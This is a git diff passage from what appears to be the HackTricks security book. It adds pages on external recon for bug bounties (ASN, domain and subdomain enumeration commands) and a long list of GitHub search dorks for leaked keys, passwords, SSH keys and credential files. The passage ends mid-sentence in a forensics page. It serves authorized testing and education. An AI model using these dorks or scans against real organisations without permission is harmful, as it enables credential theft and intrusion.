[https://github.com/hisxo/gitGraber](https://github.com/hisxo/gitGraber) +* [https://github.com/eth0izzle/shhgit](https://github.com/eth0izzle/shhgit) +* [https://github.com/techgaun/github-dorks](https://github.com/techgaun/github-dorks) +* [https://github.com/michenriksen/gitrob](https://github.com/michenriksen/gitrob) +* [https://github.com/anshumanbh/git-all-secrets](https://github.com/anshumanbh/git-all-secrets) +* [https://github.com/awslabs/git-secrets](https://github.com/awslabs/git-secrets) +* [https://github.com/kootenpv/gittyleaks](https://github.com/kootenpv/gittyleaks) +* [https://github.com/dxa4481/truffleHog](https://github.com/dxa4481/truffleHog) +* [https://github.com/obheda12/GitDorker](https://github.com/obheda12/GitDorker) + +**Dorks**: _AWS\_SECRET\_ACCESS\_KEY, API KEY, API SECRET, API TOKEN… ROOT PASSWORD, ADMIN PASSWORD, COMPANYNAME SECRET, COMPANYNAME ROOT, GCP SECRET, AWS SECRET, “username password” extension:sql, “private” extension:pgp..._ + +#### More Github Dorks + +* extension:pem private +* extension:ppk private +* extension:sql mysql dump password +* extension:json api.forecast.io +* extension:json mongolab.com +* extension:yaml mongolab.com +* extension:ica \[WFClient\] Password= +* extension:avastlic “support.avast.com” +* extension:js jsforce conn.login +* extension:json googleusercontent client\_secret + +You can also search for leaked secrets in all open repository platforms using: [https://searchcode.com/?q=auth\_key](https://searchcode.com/?q=auth_key) + +## [**Pentesting Web Methodology**](pentesting/pentesting-web/)\*\*\*\* + +Anyway, the **majority of the vulnerabilities** found by bug hunters resides inside **web applications**, so at this point I would like to talk about a **web application testing methodology**, and you can [**find this information here**](pentesting/pentesting-web/). + +## Recapitulation 2 + +> Congratulations! The testing has finished! I hope you have find some vulnerabilities. + +At this point you should have already read the Pentesting Web Methodology and applied it to the scope. +As you can see there is a lot of different vulnerabilities to search for. + +**If you have find any vulnerability thanks to this book, please reference the book in your write-up.** + diff --git a/external-recon-methodology/README.md b/external-recon-methodology/README.md new file mode 100644 index 00000000000..6401842a6ae --- /dev/null +++ b/external-recon-methodology/README.md @@ -0,0 +1,350 @@ +# External Recon Methodology + +{% hint style="danger" %} +Do you use **Hacktricks every day**? Did you find the book **very** **useful**? Would you like to **receive extra help** with cybersecurity questions? Would you like to **find more and higher quality content on Hacktricks**? +[**Support Hacktricks through github sponsors**](https://github.com/sponsors/carlospolop) **so we can dedicate more time to it and also get access to the Hacktricks private group where you will get the help you need and much more!** +{% endhint %} + +If you want to know about my **latest modifications**/**additions** or you have **any suggestion for HackTricks** or **PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/)[**telegram group**](https://t.me/peass), or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to **give ⭐** on **github** to **motivate** **me** to continue developing this book. + +## Assets discoveries + +> So you were said that everything belonging to some company is inside the scope, and you want to figure out what this company actually owns. + +The goal of this phase is to obtain all the **companies owned by the main company** and then all the **assets** of these companies. To do so, we are going to: + +1. Find the acquisitions of the main company, this will give us the companies inside the scope. +2. Find the ASN \(if any\) of each company, this will give us the IP ranges owned by each company +3. Use reverse whois lookups to search for other entries \(organisation names, domains...\) related to the first one \(this can be done recursively\) +4. Use other techniques like shodan `org`and `ssl`filters to search for other assets \(the `ssl` trick can be done recursively\). + +### Acquisitions + +First of all, we need to know which **other companies are owned by the main company**. +One option is to visit [https://www.crunchbase.com/](https://www.crunchbase.com/), **search** for the **main company**, and **click** on "**acquisitions**". There you will see other companies acquired by the main one. +Other option is to visit the **Wikipedia** page of the main company and search for **acquisitions**. + +> Ok, at this point you should know all the companies inside the scope. Lets figure out how to find their assets. + +### ASNs + +An autonomous system number \(**ASN**\) is a **unique number** assigned to an **autonomous system** \(AS\) by the **Internet Assigned Numbers Authority \(IANA\)**. +An **AS** consists of **blocks** of **IP addresses** which have a distinctly defined policy for accessing external networks and are administered by a single organisation but may be made up of several operators. + +It's interesting to find if the **company have assigned any ASN** to find its **IP ranges.** It will be interested to perform a **vulnerability test** against all the **hosts** inside the **scope** and **look for domains** inside these IPs. +**You can search by** company name**, by** IP **or by** domain **in** [**https://bgp.he.net/**](https://bgp.he.net/)**. +Depending on the region of the company this links could be useful to gather more data:** [**AFRINIC**](https://www.afrinic.net/) **\(Africa\),** [**Arin**](https://www.arin.net/about/welcome/region/)**\(North America\),** [**APNIC**](https://www.apnic.net/) **\(Asia\),** [**LACNIC**](https://www.lacnic.net/) **\(Latin America\),** [**RIPE NCC**](https://www.ripe.net/) **\(Europe\). Anyway, probably all the** useful information **\(IP ranges and Whois\)** appears already in the first link. + +```bash +#You can try "automate" this with amass, but it's not very recommended +amass intel -org tesla +amass intel -asn 8911,50313,394161 +``` + +You can find the IP ranges of an organisation also using [http://asnlookup.com/](http://asnlookup.com/) \(it has free API\). +You can fins the IP and ASN of a domain using [http://ipv4info.com/](http://ipv4info.com/). + +### Looking for vulnerabilities + +At this point we known **all the assets inside the scope**, so if you are allowed you could launch some **vulnerability scanner** \(Nessus, OpenVAS\) over all the hosts. +Also, you could launch some [**port scans**](../pentesting/pentesting-network/#discovering-hosts-from-the-outside) **or use services like** shodan **to find** open ports **and depending on what you find you should** take a look in this book to how to pentest several possible service running**. +Also, It could be worth it to mention that you can also prepare some** default username **and** passwords **lists and try to** bruteforce services with [https://github.com/x90skysn3k/brutespray](https://github.com/x90skysn3k/brutespray). + +## Domains + +> We know all the companies inside the scope and their assets, it's time to find the domains inside the scope. + +_Please, note that in the following purposed techniques you can also find subdomains and that information shouldn't be underrated._ + +First of all you should look for the **main domain**\(s\) of each company. For example, for _Tesla Inc._ is going to be _tesla.com_. + +### Reverse DNS + +As you have found all the IP ranges of the domains you could try to perform **reverse dns lookups** on those **IPs to find more domains inside the scope**. Try to use some dns server of the victim or some well-known dns server \(1.1.1.1, 8.8.8.8\) + +```bash +dnsrecon -r -n #DNS reverse of all of the addresses +dnsrecon -d facebook.com -r 157.240.221.35/24 #Using facebooks dns +dnsrecon -r 157.240.221.35/24 -n 1.1.1.1 #Using cloudflares dns +dnsrecon -r 157.240.221.35/24 -n 8.8.8.8 #Using google dns +``` + +For this to work, the administrator has to enable manually the PTR. +You can also use a online tool for this info: [http://ptrarchive.com/](http://ptrarchive.com/) + +### Reverse Whois \(loop\) + +Inside a **whois** you can find a lot of interesting **information** like **organisation name**, **address**, **emails**, phone numbers... But which is even more interesting is that you can find **more assets related to the company** if you perform **reverse whois lookups by any of those fields** \(for example other whois registries where the same email appears\). +You can use online tools like: + +* [https://viewdns.info/reversewhois/](https://viewdns.info/reversewhois/) - **Free** +* [https://domaineye.com/reverse-whois](https://domaineye.com/reverse-whois) - **Free** +* [https://www.reversewhois.io/](https://www.reversewhois.io/) - **Free** +* [https://www.whoxy.com/](https://www.whoxy.com/) - **Free** web, not free API. +* [http://reversewhois.domaintools.com/](http://reversewhois.domaintools.com/) - Not free +* [https://drs.whoisxmlapi.com/reverse-whois-search](https://drs.whoisxmlapi.com/reverse-whois-search) - Not Free \(only **100 free** searches\) +* [https://www.domainiq.com/](https://www.domainiq.com/) - Not Free + +You can automate this task using [**DomLink** ](https://github.com/vysecurity/DomLink)\(requires a whoxy API key\). +You can also perform some automatic reverse whois discovery with [amass](https://github.com/OWASP/Amass): `amass intel -d tesla.com -whois` + +**Note that you can use this technique to discover more domain names every time you find a new domain.** + +### Trackers + +If find the **same ID of the same tracker** in 2 different pages you can suppose that **both pages** are **managed by the same team**. +For example, if you see the same **Google Analytics ID** or the same **Adsense ID** on several pages. + +There are some pages that let you search by these trackers and more: + +* [**BuiltWith**](https://builtwith.com/) +* [**Sitesleuth**](https://www.sitesleuth.io/) +* [**Publicwww**](https://publicwww.com/) +* [**SpyOnWeb**](http://spyonweb.com/) + +### **Favicon** + +Did you know that we can find related domains and sub domains to our target by looking for the same favicon icon hash? This is exactly what [favihash.py](https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/favihash.py) tool made by [@m4ll0k2](https://twitter.com/m4ll0k2) does. Here’s how to use it: + +```bash +cat my_targets.txt | xargs -I %% bash -c 'echo "http://%%/favicon.ico"' > targets.txt +python3 favihash.py -f https://target/favicon.ico -t targets.txt -s +``` + +![favihash - discover domains with the same favicon icon hash](https://www.infosecmatter.com/wp-content/uploads/2020/07/favihash.jpg) + +Simply said, favihash will allow us to discover domains that have the same favicon icon hash as our target. + +### Other ways + +**Note that you can use this technique to discover more domain names every time you find a new domain.** + +#### Shodan + +As you already know the name of the organisation owning the IP space. You can search by that data in shodan using: `org:"Tesla, Inc."` Check the found hosts for new unexpected domains in the TLS certificate. + +You could access the **TLS certificate** of the main web page, obtain the **Organisation name** and then search for that name inside the **TLS certificates** of all the web pages known by **shodan** with the filter : `ssl:"Tesla Motors"` + +#### Google + +Go to the main page an find something that identifies the company, like the copyright \("Tesla © 2020"\). Search for that in google or other browsers to find possible new domains/pages. + +#### Assetfinder + +[**Assetfinder** ](https://github.com/tomnomnom/assetfinder)is a tool that look for **domains related** with a main domain and **subdomains** of them, pretty amazing. + +### Looking for vulnerabilities + +Check for some [domain takeover](../pentesting-web/domain-subdomain-takeover.md#domain-takeover). Maybe some company is **using some a domain** but they **lost the ownership**. Just register it \(if cheap enough\) and let know the company. + +If you find any **domain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** \(using Nessus or OpenVAS\) and some [**port scan**](../pentesting/pentesting-network/#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**. +_Note that sometimes the domain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._ + +## Subdomains + +> We know all the companies inside the scope, all the assets of each company and all the domains related to the companies. + +It's time to find all the possible subdomains of each found domain. + +### DNS + +Let's try to get **subdomains** from the **DNS** records. We should also try for **Zone Transfer** \(If vulnerable, you should report it\). + +```bash +dnsrecon -a -d tesla.com +``` + +### OSINT + +The fastest way to obtain a lot of subdomains is search in external sources. I'm not going to discuss which sources are the bests and how to use them, but you can find here several utilities: [https://pentester.land/cheatsheets/2018/11/14/subdomains-enumeration-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/14/subdomains-enumeration-cheatsheet.html) + +A really good place to search for subdomains is [https://crt.sh/](https://crt.sh/). + +The most used tools are [**Amass**](https://github.com/OWASP/Amass)**,** [**subfinder**](https://github.com/projectdiscovery/subfinder)**,** [**findomain**](https://github.com/Edu4rdSHL/findomain/)**,** [**OneForAll**](https://github.com/shmilylty/OneForAll/blob/master/README.en.md)**,** [**assetfinder**](https://github.com/tomnomnom/assetfinder)**,** [**Sudomy**](https://github.com/Screetsec/Sudomy)**,** [**Crobat**](https://github.com/cgboal/sonarsearch)**.** I would recommend to start using them configuring the API keys, and then start testing other tools or possibilities. + +```bash +amass enum [-active] [-ip] -d tesla.com +./subfinder-linux-amd64 -d tesla.com [-silent] +./findomain-linux -t tesla.com [--quiet] +python3 oneforall.py --target tesla.com [--dns False] [--req False] run +assetfinder --subs-only +curl https://sonar.omnisint.io/subdomains/tesla.com +``` + +Another possibly interesting tool is [**gau**](https://github.com/lc/gau)**.** It fetches known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl for any given domain. + +#### [chaos.projectdiscovery.io](https://chaos.projectdiscovery.io/#/) + +This project offers for **free all the subdomains related to bug-bounty programs**. You can access this data also using [chaospy](https://github.com/dr-0x0x/chaospy) or even access the scope used by this project [https://github.com/projectdiscovery/chaos-public-program-list](https://github.com/projectdiscovery/chaos-public-program-list) + +You could also find subdomains scrapping the web pages and parsing them \(including JS files\) searching for subdomains using [SubDomainizer](https://github.com/nsonaniya2010/SubDomainizer) or [subscraper](https://github.com/Cillian-Collins/subscraper). + +#### RapidDNS + +Quickly find subdomains using [RapidDNS](https://rapiddns.io/) API \(from [link](https://twitter.com/Verry__D/status/1282293265597779968)\): + +```text +rapiddns(){ +curl -s "https://rapiddns.io/subdomain/$1?full=1" \ + | grep -oP '_blank">\K[^<]*' \ + | grep -v http \ + | sort -u +} +``` + +#### Shodan + +You found **dev-int.bigcompanycdn.com**, make a Shodan query like the following: + +* http.html:”dev-int.bigcompanycdn.com” +* http.html:”[https://dev-int-bigcompanycdn.com”](https://dev-int-bigcompanycdn.com”) + +### DNS Brute force + +Let's try to find new **subdomains** brute-forcing DNS servers using possible subdomain names. +The most recommended tools for this are [**massdns**](https://github.com/blechschmidt/massdns)**,** [**gobuster**](https://github.com/OJ/gobuster)**,** [**aiodnsbrute**](https://github.com/blark/aiodnsbrute) **and** [**shuffledns**](https://github.com/projectdiscovery/shuffledns). The first one is faster but more prone to errors \(you should always check for **false positives**\) and the second one **is more reliable** \(always use gobuster\). + +For this action you will need some common subdomains lists like: + +* [https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056](https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056) +* [https://github.com/pentester-io/commonspeak](https://github.com/pentester-io/commonspeak) + +{% code title="Gobuster bruteforcing dns" %} +```bash +gobuster dns -d mysite.com -t 50 -w subdomains.txt +``` +{% endcode %} + +For **massdns** you will need to pass as argument the file will all the **possible well formed subdomains** you want to bruteforce and list of DNS resolvers to use. Some projects that use massdns as base and provides better results by checking massdns results are [**shuffledns**](https://github.com/projectdiscovery/shuffledns) **and** [**puredns**](https://github.com/d3mondev/puredns)**.** + +```bash +sed 's/$/.domain.com/' subdomains.txt > bf-subdomains.txt +./massdns -r resolvers.txt -w /tmp/results.txt bf-subdomains.txt +grep -E "tesla.com. [0-9]+ IN A .+" /tmp/results.txt + +shuffledns -d example.com -list example-subdomains.txt -r resolvers.txt +puredns bruteforce all.txt domain.com +``` + +Note how these tools require a **list of IPs of public DNSs**. If these public DNSs are malfunctioning \(DNS poisoning for example\) you will get bad results. In order to generate a list of trusted DNS resolvers you can download the resolvers from [https://public-dns.info/nameservers-all.txt](https://public-dns.info/nameservers-all.txt) and use [**dnsvalidator**](https://github.com/vortexau/dnsvalidator) to filter them. + +### VHosts / Virtual Hosts + +#### IP VHosts + +You can find some VHosts in IPs using [HostHunter](https://github.com/SpiderLabs/HostHunter) + +#### Brute Force + +If you suspect that some subdomain can be hidden in a web server you could try to brute force it: + +```bash +gobuster vhost -u https://mysite.com -t 50 -w subdomains.txt + +wfuzz -c -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-20000.txt --hc 400,404,403 -H "Host: FUZZ.example.com" -u http://example.com -t 100 + +#From https://github.com/allyshka/vhostbrute +vhostbrute.py --url="example.com" --remoteip="10.1.1.15" --base="www.example.com" --vhosts="vhosts_full.list" + +#https://github.com/codingo/VHostScan +VHostScan -t example.com +``` + +{% hint style="info" %} +With this technique you may even be able to access internal/hidden endpoints. +{% endhint %} + +### CORS Brute Force + +Sometimes you will find pages that only return the header _**Access-Control-Allow-Origin**_ when a valid domain/subdomain is set in the _**Origin**_ header. In these scenarios, you can abuse this behavior to **discover** new **subdomains**. + +```bash +ffuf -w subdomains-top1million-5000.txt -u http://10.10.10.208 -H 'Origin: http://FUZZ.crossfit.htb' -mr "Access-Control-Allow-Origin" -ignore-body +``` + +### DNS Brute Force v2 + +Once you have finished looking for subdomains you can use [**dnsgen**](https://github.com/ProjectAnte/dnsgen)**,** [**altdns**](https://github.com/infosec-au/altdns) and [**gotator**](https://github.com/Josue87/gotator) to generate possible permutations of the discovered subdomains and use again **massdns** and **gobuster** to search new domains. + +### Buckets Brute Force + +While looking for **subdomains** keep an eye to see if it is **pointing** to any type of **bucket**, and in that case [**check the permissions**](../pentesting/pentesting-web/buckets/)**.** +Also, as at this point you will know all the domains inside the scope, try to [**brute force possible bucket names and check the permissions**](../pentesting/pentesting-web/buckets/). + +### Monitorization + +You can **monitor** if **new subdomains** of a domain are created by monitoring the **Certificate Transparency** Logs [**sublert** ](https://github.com/yassineaboukir/sublert/blob/master/sublert.py)does. + +### Looking for vulnerabilities + +Check for possible [**subdomain takeovers**](../pentesting-web/domain-subdomain-takeover.md#subdomain-takeover). +If the **subdomain** is pointing to some **S3 bucket**, [**check the permissions**](../pentesting/pentesting-web/buckets/). + +If you find any **subdomain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** \(using Nessus or OpenVAS\) and some [**port scan**](../pentesting/pentesting-network/#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**. +_Note that sometimes the subdomain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._ + +## Web servers hunting + +> We have found all the companies and their assets and we know IP ranges, domains and subdomains inside the scope. It's time to search for web servers. + +In the previous steps probably you have already perform some **recon to the IPs and domains discovered**, so you may **already found all the possible web servers**. However, if you haven't we are now going to see some **fast tricks to search for web servers** inside the scope. + +Please, note that this will be **oriented to search for web apps**, you should **perform the vulnerability** and **port scanning** also \(**if allowed** by the scope\). + +A **fast method** to discover **ports open** related to **web** servers using [**masscan** can be found here](../pentesting/pentesting-network/#http-port-discovery). +Another friendly tool to look for web servers is [**httprobe**](https://github.com/tomnomnom/httprobe) **and** [**fprobe**](https://github.com/theblackturtle/fprobe). You just pass a list of domains and it will try to connect to port 80 \(http\) and 443 \(https\). You can additional indicate to try other ports: + +```bash +cat /tmp/domains.txt | httprobe #Test all domains inside the file for port 80 and 443 +cat /tmp/domains.txt | httprobe -p http:8080 -p https:8443 #Check port 80, 443 and 8080 and 8443 +``` + +### Screenshots + +Now that you have discovered **all the web servers** running in the scope \(in **IPs** of the company and all the **domains** and **subdomains**\) you probably **don't know where to start**. So, let's make it simple and start just taking screenshots of all of them. Just **taking a look** to the **main page** of all of them you could find **weird** endpoints more **prone** to be **vulnerable**. + +To perform the proposed idea you can use [**EyeWitness**](https://github.com/FortyNorthSecurity/EyeWitness), [**HttpScreenshot**](https://github.com/breenmachine/httpscreenshot), [**Aquatone**](https://github.com/michenriksen/aquatone), ****[**shutter**](https://shutter-project.org/downloads/) ****or [**webscreenshot**](https://github.com/maaaaz/webscreenshot)**.** + +## Cloud Assets + +Just with some **specific keywords** identifying the company it's possible to enumerate possible cloud assets belonging to them with tools like [**cloud\_enum**](https://github.com/initstring/cloud_enum)**,** [**CloudScraper**](https://github.com/jordanpotti/CloudScraper) **or** [**cloudlist**](https://github.com/projectdiscovery/cloudlist)**.** + +## Recapitulation 1 + +> Congratulations! At this point you have already perform all the basic enumeration. Yes, it's basic because a lot more enumeration can be done \(will see more tricks later\). +> Do you know that the BBs experts recommends to spend only 10-15mins in this phase? But don't worry, one you have practice you will do this even faster than that. + +So you have already: + +1. Found all the **companies** inside the scope +2. Found all the **assets** belonging to the companies \(and perform some vuln scan if in scope\) +3. Found all the **domains** belonging to the companies +4. Found all the **subdomains** of the domains \(any subdomain takeover?\) +5. Found all the **web servers** and took a **screenshot** of them \(anything weird worth a deeper look?\) + +Then, it's time for the real Bug Bounty hunt! In this methodology I'm **not going to talk about how to scan hosts** \(you can see a [guide for that here](../pentesting/pentesting-network/)\), how to use tools like Nessus or OpenVas to perform a **vuln scan** or how to **look for vulnerabilities** in the services open \(this book already contains tons of information about possible vulnerabilities on a lot of common services\). **But, don't forget that if the scope allows it, you should give it a try.** + +## Github leaked secrets + +{% page-ref page="github-leaked-secrets.md" %} + +You can also search for leaked secrets in all open repository platforms using: [https://searchcode.com/?q=auth\_key](https://searchcode.com/?q=auth_key) + +## [**Pentesting Web Methodology**](../pentesting/pentesting-web/) + +Anyway, the **majority of the vulnerabilities** found by bug hunters resides inside **web applications**, so at this point I would like to talk about a **web application testing methodology**, and you can [**find this information here**](../pentesting/pentesting-web/). + +## Recapitulation 2 + +> Congratulations! The testing has finished! I hope you have find some vulnerabilities. + +At this point you should have already read the Pentesting Web Methodology and applied it to the scope. +As you can see there is a lot of different vulnerabilities to search for. + +**If you have find any vulnerability thanks to this book, please reference the book in your write-up.** + +## **References** + +* **All free courses of** [**@Jhaddix**](https://twitter.com/Jhaddix) **\(like** [**The Bug Hunter's Methodology v4.0 - Recon Edition**](https://www.youtube.com/watch?v=p4JgIu1mceI)**\)** + diff --git a/external-recon-methodology/github-leaked-secrets.md b/external-recon-methodology/github-leaked-secrets.md new file mode 100644 index 00000000000..98d7e3f3e5b --- /dev/null +++ b/external-recon-methodology/github-leaked-secrets.md @@ -0,0 +1,300 @@ +# Github Leaked Secrets + +Now that we have built the list of assets of our scope it's time to search for some OSINT low-hanging fruits. + +### Api keys leaks in github + +* [https://github.com/hisxo/gitGraber](https://github.com/hisxo/gitGraber) +* [https://github.com/eth0izzle/shhgit](https://github.com/eth0izzle/shhgit) +* [https://github.com/techgaun/github-dorks](https://github.com/techgaun/github-dorks) +* [https://github.com/michenriksen/gitrob](https://github.com/michenriksen/gitrob) +* [https://github.com/anshumanbh/git-all-secrets](https://github.com/anshumanbh/git-all-secrets) +* [https://github.com/awslabs/git-secrets](https://github.com/awslabs/git-secrets) +* [https://github.com/kootenpv/gittyleaks](https://github.com/kootenpv/gittyleaks) +* [https://github.com/dxa4481/truffleHog](https://github.com/dxa4481/truffleHog) +* [https://github.com/obheda12/GitDorker](https://github.com/obheda12/GitDorker) + +### **Dorks** + +```bash +".mlab.com password" +"access_key" +"access_token" +"amazonaws" +"api.googlemaps AIza" +"api_key" +"api_secret" +"apidocs" +"apikey" +"apiSecret" +"app_key" +"app_secret" +"appkey" +"appkeysecret" +"application_key" +"appsecret" +"appspot" +"auth" +"auth_token" +"authorizationToken" +"aws_access" +"aws_access_key_id" +"aws_key" +"aws_secret" +"aws_token" +"AWSSecretKey" +"bashrc password" +"bucket_password" +"client_secret" +"cloudfront" +"codecov_token" +"config" +"conn.login" +"connectionstring" +"consumer_key" +"credentials" +"database_password" +"db_password" +"db_username" +"dbpasswd" +"dbpassword" +"dbuser" +"dot-files" +"dotfiles" +"encryption_key" +"fabricApiSecret" +"fb_secret" +"firebase" +"ftp" +"gh_token" +"github_key" +"github_token" +"gitlab" +"gmail_password" +"gmail_username" +"herokuapp" +"internal" +"irc_pass" +"JEKYLL_GITHUB_TOKEN" +"key" +"keyPassword" +"ldap_password" +"ldap_username" +"login" +"mailchimp" +"mailgun" +"master_key" +"mydotfiles" +"mysql" +"node_env" +"npmrc _auth" +"oauth_token" +"pass" +"passwd" +"password" +"passwords" +"pem private" +"preprod" +"private_key" +"prod" +"pwd" +"pwds" +"rds.amazonaws.com password" +"redis_password" +"root_password" +"secret" +"secret.password" +"secret_access_key" +"secret_key" +"secret_token" +"secrets" +"secure" +"security_credentials" +"send.keys" +"send_keys" +"sendkeys" +"SF_USERNAME salesforce" +"sf_username" +"site.com" FIREBASE_API_JSON= +"site.com" vim_settings.xml +"slack_api" +"slack_token" +"sql_password" +"ssh" +"ssh2_auth_password" +"sshpass" +"staging" +"stg" +"storePassword" +"stripe" +"swagger" +"testuser" +"token" +"x-api-key" +"xoxb " +"xoxp" +[WFClient] Password= extension:ica +access_key +bucket_password +dbpassword +dbuser +extension:avastlic "support.avast.com" +extension:bat +extension:cfg +extension:env +extension:exs +extension:ini +extension:json api.forecast.io +extension:json googleusercontent client_secret +extension:json mongolab.com +extension:pem +extension:pem private +extension:ppk +extension:ppk private +extension:properties +extension:sh +extension:sls +extension:sql +extension:sql mysql dump +extension:sql mysql dump password +extension:yaml mongolab.com +extension:zsh +filename:.bash_history +filename:.bash_history DOMAIN-NAME +filename:.bash_profile aws +filename:.bashrc mailchimp +filename:.bashrc password +filename:.cshrc +filename:.dockercfg auth +filename:.env DB_USERNAME NOT homestead +filename:.env MAIL_HOST=smtp.gmail.com +filename:.esmtprc password +filename:.ftpconfig +filename:.git-credentials +filename:.history +filename:.htpasswd +filename:.netrc password +filename:.npmrc _auth +filename:.pgpass +filename:.remote-sync.json +filename:.s3cfg +filename:.sh_history +filename:.tugboat NOT _tugboat +filename:_netrc password +filename:apikey +filename:bash +filename:bash_history +filename:bash_profile +filename:bashrc +filename:beanstalkd.yml +filename:CCCam.cfg +filename:composer.json +filename:config +filename:config irc_pass +filename:config.json auths +filename:config.php dbpasswd +filename:configuration.php JConfig password +filename:connections +filename:connections.xml +filename:constants +filename:credentials +filename:credentials aws_access_key_id +filename:cshrc +filename:database +filename:dbeaver-data-sources.xml +filename:deployment-config.json +filename:dhcpd.conf +filename:dockercfg +filename:environment +filename:express.conf +filename:express.conf path:.openshift +filename:filezilla.xml +filename:filezilla.xml Pass +filename:git-credentials +filename:gitconfig +filename:global +filename:history +filename:htpasswd +filename:hub oauth_token +filename:id_dsa +filename:id_rsa +filename:id_rsa or filename:id_dsa +filename:idea14.key +filename:known_hosts +filename:logins.json +filename:makefile +filename:master.key path:config +filename:netrc +filename:npmrc +filename:pass +filename:passwd path:etc +filename:pgpass +filename:prod.exs +filename:prod.exs NOT prod.secret.exs +filename:prod.secret.exs +filename:proftpdpasswd +filename:recentservers.xml +filename:recentservers.xml Pass +filename:robomongo.json +filename:s3cfg +filename:secrets.yml password +filename:server.cfg +filename:server.cfg rcon password +filename:settings +filename:settings.py SECRET_KEY +filename:sftp-config.json +filename:sftp-config.json password +filename:sftp.json path:.vscode +filename:shadow +filename:shadow path:etc +filename:spec +filename:sshd_config +filename:token +filename:tugboat +filename:ventrilo_srv.ini +filename:WebServers.xml +filename:wp-config +filename:wp-config.php +filename:zhrc +HEROKU_API_KEY language:json +HEROKU_API_KEY language:shell +HOMEBREW_GITHUB_API_TOKEN language:shell +jsforce extension:js conn.login +language:yaml -filename:travis +msg nickserv identify filename:config +org:Target "AWS_ACCESS_KEY_ID" +org:Target "list_aws_accounts" +org:Target "aws_access_key" +org:Target "aws_secret_key" +org:Target "bucket_name" +org:Target "S3_ACCESS_KEY_ID" +org:Target "S3_BUCKET" +org:Target "S3_ENDPOINT" +org:Target "S3_SECRET_ACCESS_KEY" +password +path:sites databases password +private -language:java +PT_TOKEN language:bash +redis_password +root_password +secret_access_key +SECRET_KEY_BASE= +shodan_api_key language:python +WORDPRESS_DB_PASSWORD= +xoxp OR xoxb OR xoxa +s3.yml +.exs +beanstalkd.yml +deploy.rake +.sls +AWS_SECRET_ACCESS_KEY +API KEY +API SECRET +API TOKEN +ROOT PASSWORD +ADMIN PASSWORD +GCP SECRET +AWS SECRET +"private" extension:pgp +``` + diff --git a/forensics/basic-forensic-methodology/README.md b/forensics/basic-forensic-methodology/README.md new file mode 100644 index 00000000000..d1b2b61908a --- /dev/null +++ b/forensics/basic-forensic-methodology/README.md @@ -0,0 +1,72 @@ +# Basic Forensic Methodology + +{% hint style="danger" %} +Do you use **Hacktricks every day**? Did you find the book **very** **useful**? Would you like to **receive extra help** with cybersecurity questions? Would you like to **find more and higher quality content on Hacktricks**? +[**Support Hacktricks through github sponsors**](https://github.com/sponsors/carlospolop) **so we can dedicate more time to it and also get access to the Hacktricks private group where you will get the help you need and much more!** +{% endhint %} + +If you want to know about my **latest modifications**/**additions** or you have **any suggestion for HackTricks** or **PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/)[**telegram group**](https://t.me/peass), or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to **give ⭐** on **github** to **motivate** **me** to continue developing this book. + + + +In this section of the book we are going to learn about some **useful forensics tricks**. +We are going to talk about partitions, file-systems, carving, memory, logs, backups, OSs, and much more. + +So if you are doing a professional forensic analysis to some data or just playing a CTF you can find here useful interesting tricks. + +## Creating and Mounting an Image + +{% page-ref page="image-adquisition-and-mount.md" %} + +## Malware Analysis + +This **isn't necessary the first step to perform once you have the image**. But you can use this malware analysis techniques independently if you have a file, a file-system image, memory image, pcap... so it's good to **keep these actions in mind**: + +{% page-ref page="malware-analysis.md" %} + +## Inspecting an Image + +if you are given a **forensic image** of a device you can start **analyzing the partitions, file-system** used and **recovering** potentially **interesting files** \(even deleted ones\). Learn how in: + +{% page-ref page="partitions-file-systems-carving/" %} + +Depending on the used OSs and even platform different interesting artifacts should be searched: + +{% page-ref page="windows-forensics/" %} + +{% page-ref page="linux-forensics.md" %} + +{% page-ref page="docker-forensics.md" %} + +## Deep inspection of specific file-types and Software + +If you have very **suspicious** **file**, then **depending on the file-type and software** that created it several **tricks** may be useful. +Read the following page to learn some interesting tricks: + +{% page-ref page="specific-software-file-type-tricks/" %} + +I want to do a special mention to the page: + +{% page-ref page="specific-software-file-type-tricks/browser-artifacts.md" %} + +## Memory Dump Inspection + +{% page-ref page="memory-dump-analysis/" %} + +## Pcap Inspection + +{% page-ref page="pcap-inspection/" %} + +## **Anti-Forensic Techniques** + +Keep in mind the possible use of anti-forensic techniques: + +{% page-ref page="anti-forensic-techniques.md" %} + +## Threat Hunting + +{% page-ref page="file-integrity-monitoring.md" %} + + + diff --git a/forensics/basic-forensic-methodology/anti-forensic-techniques.md b/forensics/basic-forensic-methodology/anti-forensic-techniques.md new file mode 100644 index 00000000000..4303865fc65 --- /dev/null +++ b/forensics/basic-forensic-methodology/anti-forensic-techniques.md @@ -0,0 +1,155 @@ +# Anti-Forensic Techniques + +## Timestamps + +An attacker may be interested in **changing the timestamps of files** to avoid being detected. +It's possible to find the timestamps inside the MFT in attributes `$STANDARD_INFORMATION` __and __`$FILE_NAME`. + +Both attributes have 4 timestamps: **Modification**, **access**, **creation**, and **MFT registry modification** \(MACE or MACB\). + +**Windows explorer** and other 